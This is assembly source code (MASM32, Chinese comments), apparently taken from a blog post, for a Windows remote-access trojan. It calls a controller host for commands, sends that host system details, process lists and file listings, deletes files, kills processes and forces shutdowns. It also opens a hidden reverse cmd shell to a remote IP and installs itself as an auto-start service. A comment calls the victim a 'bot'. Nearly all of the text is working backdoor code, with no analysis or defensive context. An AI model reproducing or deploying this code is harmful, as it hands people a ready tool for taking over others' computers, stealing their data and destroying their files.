szKeyName db 100 dup(?)
.const
MEMORYSIZE equ 50
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DelFile proc _filename:DWORD
invoke DeleteFile,_filename
ret
_DelFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFilePath proc _lpszPath
local @stFindFile:WIN32_FIND_DATA
local @hFindFile
local @szPath[MAX_PATH]:byte ;用来存放“路径/”
local @szSearch[MAX_PATH]:byte ;用来存放“路径/*.*”
local @szFindFile[1025]:byte ;用来存放“路径/找到的文件”
local hWnd
pushad
invoke RtlZeroMemory,addr @szPath,sizeof @szPath
invoke RtlZeroMemory,addr @szSearch,sizeof @szSearch
invoke lstrcpy,addr @szPath,_lpszPath
;********************************************************************
; 在路径后面加上/*.*
;********************************************************************
@@:
invoke lstrlen,addr @szPath
lea ecx,@szPath
add ecx,eax
xor eax,eax
mov al,'/'
.if byte ptr [ecx-1] != al
mov word ptr [ecx],ax
.endif
invoke lstrcpy,addr @szSearch,addr @szPath
invoke lstrcat,addr @szSearch,CTXT("*.*")
;********************************************************************
; 寻找文件
;********************************************************************
invoke FindFirstFile,addr @szSearch,addr @stFindFile
.if eax != INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat
invoke lstrcpy,addr @szFindFile,addr @szPath
invoke lstrcat,addr @szFindFile,addr @stFindFile.cFileName
.if @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ;找到的是目录吗?
.if @stFindFile.cFileName != '.'
inc dwFolderCount
; invoke MessageBox,0,addr @szFindFile,0,MB_ICONSTOP;如果找到的是目录,就递归继续找
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0
invoke Sleep,1000
.endif
.else
; invoke MessageBox,0,addr @szFindFile,0,MB_ICONINFORMATION
invoke lstrlen,addr @szFindFile
invoke send,server,addr @szFindFile,eax,0
invoke Sleep,1000
.endif
invoke FindNextFile,@hFindFile,addr @stFindFile
.until eax == FALSE
invoke FindClose,@hFindFile
.endif
popad
ret
_GetFilePath endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFileDsik proc _socket
local szDisk[10]:byte
invoke Sleep,10
invoke lstrcpy,addr szVol,CTXT("C")
.while szVol<='Z'
invoke lstrcat,addr szDisk,addr szVol
invoke lstrcat,addr szDisk,CTXT(":/")
invoke GetDriveType,addr szDisk
.if eax==DRIVE_FIXED
invoke lstrlen,addr szDisk
invoke send,_socket,addr szDisk,eax,0
invoke Sleep,1000
.elseif eax==DRIVE_REMOVABLE
invoke lstrlen,addr szDisk
invoke send,_socket,addr szDisk,eax,0
invoke Sleep,1000
.endif
invoke RtlZeroMemory,addr szDisk,sizeof szDisk
inc szVol
.endw
ret
_GetFileDsik endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ExitWindows proc
local ShutDown:DWORD
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,TRUE,addr ShutDown
.if eax==00C000007Ch
invoke RtlAdjustPrivilege,SE_SHUTDOWN_PRIVILEGE,TRUE,FALSE,addr ShutDown
invoke ZwShutdownSystem,2
.endif
ret
_ExitWindows endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_KillProcess proc processname:DWORD
local stProcess:PROCESSENTRY32
invoke RtlZeroMemory,addr stProcess,sizeof stProcess;清空内存
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke CompareString,LOCALE_USER_DEFAULT,NORM_IGNORECASE,processname,-1,addr stProcess.szExeFile,-1
.if eax==2
push stProcess.th32ProcessID
pop closepid
.endif
invoke Process32Next,hSnapShot,addr stProcess
.endw
invoke OpenProcess,PROCESS_TERMINATE,FALSE,closepid
.if eax
mov ebx,eax
invoke TerminateProcess,ebx,-1
.endif
ret
_KillProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetProcessList proc _socket
local stProcess:PROCESSENTRY32
invoke RtlZeroMemory,addr stProcess,sizeof stProcess;清空内存
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,addr stProcess
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
.while eax
invoke lstrlen,addr stProcess.szExeFile
invoke send,_socket,addr stProcess.szExeFile,eax,0
; invoke MessageBox,0,addr stProcess.szExeFile,0,0
invoke Sleep,1000
invoke Process32Next,hSnapShot,addr stProcess
.endw
ret
_GetProcessList endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
LOCAL hToken
LOCAL tkp : TOKEN_PRIVILEGES
invoke GetCurrentProcess ;GetCurrentProcess获得当前进程的HANDLE
mov edx, eax
invoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken ;获取进程访问令牌
invoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid;一个权限对应的LUID值
mov tkp.PrivilegeCount, 1
xor eax, eax
.if bFlags
mov eax, SE_PRIVILEGE_ENABLED
.endif
mov tkp.Privileges.Attributes, eax
invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 ;对这个访问令牌进行修改
push eax
invoke CloseHandle, hToken
pop eax
ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ReadInternet proc
local @hSession,@hHttpFile,@dwRead ;局部参数
pushad ;所有寄存器压栈保存
; invoke RtlZeroMemory,addr szIP,sizeof szIP
invoke InternetOpen,CTXT("ReadFile"),INTERNET_OPEN_TYPE_PRECONFIG,/
NULL,NULL,0 ;打开internet
.if eax ;测试返回值
mov @hSession,eax ;保存句柄
.endif
invoke InternetOpenUrl,@hSession,addr szUrl,NULL,0,INTERNET_FLAG_NO_AUTO_REDIRECT,0
.if eax
mov @hHttpFile,eax
.endif
invoke InternetReadFile,@hHttpFile,addr szIP,sizeof szIP,addr @dwRead;读出IP并且保存
invoke InternetCloseHandle,@hHttpFile;关闭句柄
invoke InternetCloseHandle,@hSession
popad ;恢复
ret
_ReadInternet endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Cmd proc
local @wsaData:WSADATA
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
local hSocket
invoke WSAStartup,202h,addr @wsaData ;初始化WSAStartup库
invoke WSASocket,PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字
mov hSocket,eax ;保存句柄
mov @stAddr.sin_family,AF_INET ;设置IP格式
invoke htons,8888 ;设置端口
mov @stAddr.sin_port,ax ;保存
invoke inet_addr,addr szIP;转换读取到的IP
mov @stAddr.sin_addr,eax
invoke connect,hSocket,addr @stAddr,sizeof @stAddr;如果有客户端连接,马上确定
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke GetStartupInfo,addr stStartUp
mov ebx,hSocket ;保存套接字到ebx
mov stStartUp.hStdInput,ebx ;给成员赋值,准备cmd转向输出
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,101h
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,CTXT("cmd"),NULL,NULL,1,0,NULL,NULL,addr stStartUp,addr stProcInfo
invoke WaitForSingleObject,addr stProcInfo.hProcess,INFINITE ; 阻塞等待进程结束
invoke closesocket,hSocket
ret
_Cmd endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateSerice proc
LOCAL hSCManager
LOCAL hService
LOCAL szBuff[MAX_PATH] :byte
LOCAL ServiceStatus:SERVICE_STATUS
invoke OpenSCManager, NULL, NULL, SC_MANAGER_Create_SERVICE ;连接服务管理器
.if eax!=0
mov hSCManager, eax ;连接成功,返回一个句柄
invoke OpenService, hSCManager,CTXT("GetSysService"), Delete ;打开服务
.if eax!=0 ;打开失败
push eax ;直接传递参数删除
invoke DeleteService, eax
call CloseServiceHandle
.endif
invoke GetModuleFileName,NULL,addr szBuff,200
invoke CreateService, hSCManager,CTXT("GetSysService"),CTXT("GetSysForShellexecute"),/ ;创建服务!
SERVICE_START + SERVICE_QUERY_STATUS + Delete, /
SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START, /
SERVICE_ERROR_IGNORE, addr szBuff,NULL, NULL, NULL, NULL, NULL
.if eax!=0
mov hService, eax
invoke StartService, hService, 0, NULL;开始打开执行!
invoke CloseServiceHandle, hService
.endif
invoke CloseServiceHandle, hSCManager
.endif
ret
_CreateSerice endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;应该当作一个指针。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SendSysInfo proc _socket:LPSTR
local OS:OSVERSIONINFO
local szTime:SYSTEMTIME
local szTimeBuff[1024]:DWORD
local sa:in_addr
local @hKey:DWORD
local BufSize:DWORD
pushad
invoke gethostname,addr szHostName,sizeof szHostName
invoke gethostbyname,addr szHostName
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke inet_ntoa,eax
invoke wsprintf,addr szHost,CTXT("%s"),eax
invoke lstrcpy,addr sysinfo.szHostIP,addr szHost
invoke lstrcpy,addr sysinfo.szHostName,addr szHostName
invoke GetSystemTime,addr szTime
movzx ebx,szTime.wMonth
movzx eax,szTime.wDay
movzx ecx,szTime.wHour
movzx edx,szTime.wMinute
invoke wsprintf,addr szTimeBuff,CTXT("%d月%d日%d时%d秒"),ebx,eax,ecx,edx
invoke lstrcpy,addr sysinfo.szHostTime,addr szTimeBuff
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegQueryValueEx,@hKey,addr szKey,NULL,NULL,addr szKeyName,addr BufSize ;读取注释内容
.if eax == ERROR_SUCCESS
invoke lstrcpy,addr sysinfo.szWhat,addr szKeyName ;有则填充
.elseif
invoke RtlZeroMemory,addr sysinfo.szWhat,sizeof sysinfo.szWhat ;无则清空
.endif
invoke RegCloseKey,@hKey
.endif
invoke lstrcat,addr szSysinfoData,addr sysinfo
invoke lstrcat,addr szSysinfoData,CTXT("[info]")
;--------------------------------------------------------------------------------------------------
;
;********[info] 前面是自定义协议,后面是判断的条件,发送到客户端后提取出判断条件,剩下的是协议
;
;---------------------------------------------------------------------------------------------------
invoke lstrlen,addr szSysinfoData
invoke send,_socket,addr szSysinfoData,eax,0
popad
ret
SendSysInfo endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Main proc
local @temp:SOCKET
local @stAddr:sockaddr_in
local @dwRecv
; call _CreateSerice ;设置系统服务启动(应该在程序开始启动的时候写进去)
connectstart:
invoke WSAStartup,202H,addr @stData
invoke RtlZeroMemory,addr @stAddr,sizeof sockaddr_in
mov @stAddr.sin_family,AF_INET
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;这里连接的端口要和客户端监听的端口一样
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke htons,9999
mov @stAddr.sin_port,ax
call _ReadInternet
invoke inet_addr,addr szIP
mov @stAddr.sin_addr,eax
invoke socket,AF_INET,SOCK_STREAM,0
mov server,eax
invoke connect,server,addr @stAddr,sizeof @stAddr
.if eax == SOCKET_ERROR
jmp _Ret
.endif
invoke SendSysInfo,server ;发送肉鸡上线信息
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;循环处理客户消息命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
invoke recv,server,addr lpBuffer,1024,0
mov @dwRecv,eax
invoke StrStr,addr lpBuffer,CTXT("[getprocess]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetProcessList,server,0,addr ThreadId
.endif
invoke StrStr,addr lpBuffer,CTXT("[killprocess]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13
lea esi,lpBuffer
lea edi,buff2
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _KillProcess,addr buff2,0,addr ThreadId1
.endif
invoke StrStr,addr lpBuffer,CTXT("[exitwindows]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _ExitWindows,0,0,addr ThreadId2
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfile]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetFileDsik,server,0,addr ThreadId3
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfilepaht]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13
lea esi,lpBuffer
lea edi,buff3
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _GetFilePath,addr buff3,0,addr ThreadId4
.endif
invoke StrStr,addr lpBuffer,CTXT("[delfile]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,9
lea esi,lpBuffer
lea edi,buff4
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _DelFile,addr buff4,0,addr ThreadId5
.endif
invoke StrStr,addr lpBuffer,CTXT("Upfile")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,6
lea esi,lpBuffer
lea edi,buff5
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
; invoke MessageBox,0,addr buff5,0,0
; invoke CreateThread,NULL,0,addr _UpFile,server,0,addr ThreadId7
.endif
.endw
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Ret:
.if server
invoke closesocket,server
xor eax,eax
mov server,eax
.endif
invoke WSACleanup
invoke Sleep,1000
jmp connectstart
ret
_Main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start proc
invoke CreateMutex, NULL, TRUE,CTXT("GetSys1_Mutex")
mov ebx,eax
invoke GetLastError
.if eax!=0B7h
push ecx
invoke CreateThread,NULL,0,offset _Main,0,NULL,esp
pop ecx
invoke CloseHandle,eax
.elseif
mov eax,FALSE
.endif
;********************************************************************
; 消息循环
;********************************************************************
.while TRUE
invoke GetMessage,addr stMsg,NULL,0,0
invoke DispatchMessage,addr stMsg
.endw
ret
start endp
end start
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
